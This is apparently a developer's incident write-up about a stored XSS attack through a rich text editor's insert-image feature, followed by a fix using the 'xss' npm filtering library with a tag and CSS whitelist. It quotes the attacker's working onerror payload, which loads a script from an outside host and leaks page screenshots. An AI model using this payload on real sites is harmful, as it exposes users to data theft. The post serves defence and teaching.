Blame it all on the rich text editor….

A plain text field was changed into a rich text editor so that users could paste images directly. Attackers then abused the option for inserting images from the web to attack other users, using an image tag with a handler like this:

onerror="s=createElement('script'); body.appendChild(s); s.src='//x0.nz/nQqS'"

When the stored data is rendered, the onerror handler fires and loads the remote script; the result is that a screenshot of the current page is sent to an email address chosen by the attacker.

The first fix was simply to disable the editor's option for inserting images from the web, but the attacker bypassed it by using Fiddler to modify the request parameters directly, achieving the same effect.

In the end, a third-party XSS filtering library was adopted and a whitelist configured, which solved the problem. Data is filtered both when it is submitted and when it is returned from the back end.

Chinese documentation for the plugin: github.com/leizongmin/…

npm install xss

import filterXSS from "xss"

User-defined filtering rules

When calling the xss() function to filter, custom rules can be passed as the second argument:

const options = {};
const html = filterXSS('<script>alert("xss");</script>', options);

whiteList: an object of the form {'tagName': ['attribute1', 'attribute2']}. Tags not in the whitelist are filtered out, and so are attributes not listed for their tag.

const options = {
  whiteList: {
    h1: ["style"], h2: ["style"], h3: ["style"], h4: ["style"], h5: ["style"], h6: ["style"],
    hr: ["style"], span: ["style"], strong: ["style"], b: ["style"], i: ["style"], br: [],
    p: ["style"], pre: ["style"], code: ["style"],
    a: ["style", "target", "href", "title", "rel"],
    img: ["style", "src", "title"],
    div: ["style"],
    table: ["style", "width", "border"], tr: ["style"],
    td: ["style", "width", "colspan"], th: ["style", "width", "colspan"], tbody: ["style"],
    ul: ["style"], li: ["style"], ol: ["style"], dl: ["style"], dt: ["style"],
    em: ["style"], cite: ["style"],
    section: ["style"], header: ["style"], footer: ["style"], blockquote: ["style"],
    audio: ["autoplay", "controls", "loop", "preload", "src"],
    video: ["autoplay", "controls", "loop", "preload", "src", "height", "width"],
  },
  // Remove the body of non-whitelisted tags as well (e.g. the text inside <script>...</script>)
  stripIgnoreTagBody: true,
  // Inline CSS is filtered separately: only these properties are kept
  css: {
    whiteList: {
      color: true, "background-color": true, width: true, height: true,
      "max-width": true, "max-height": true, "min-width": true, "min-height": true,
      "font-size": true,
    },
  },
};
content = filterXSS(content, options);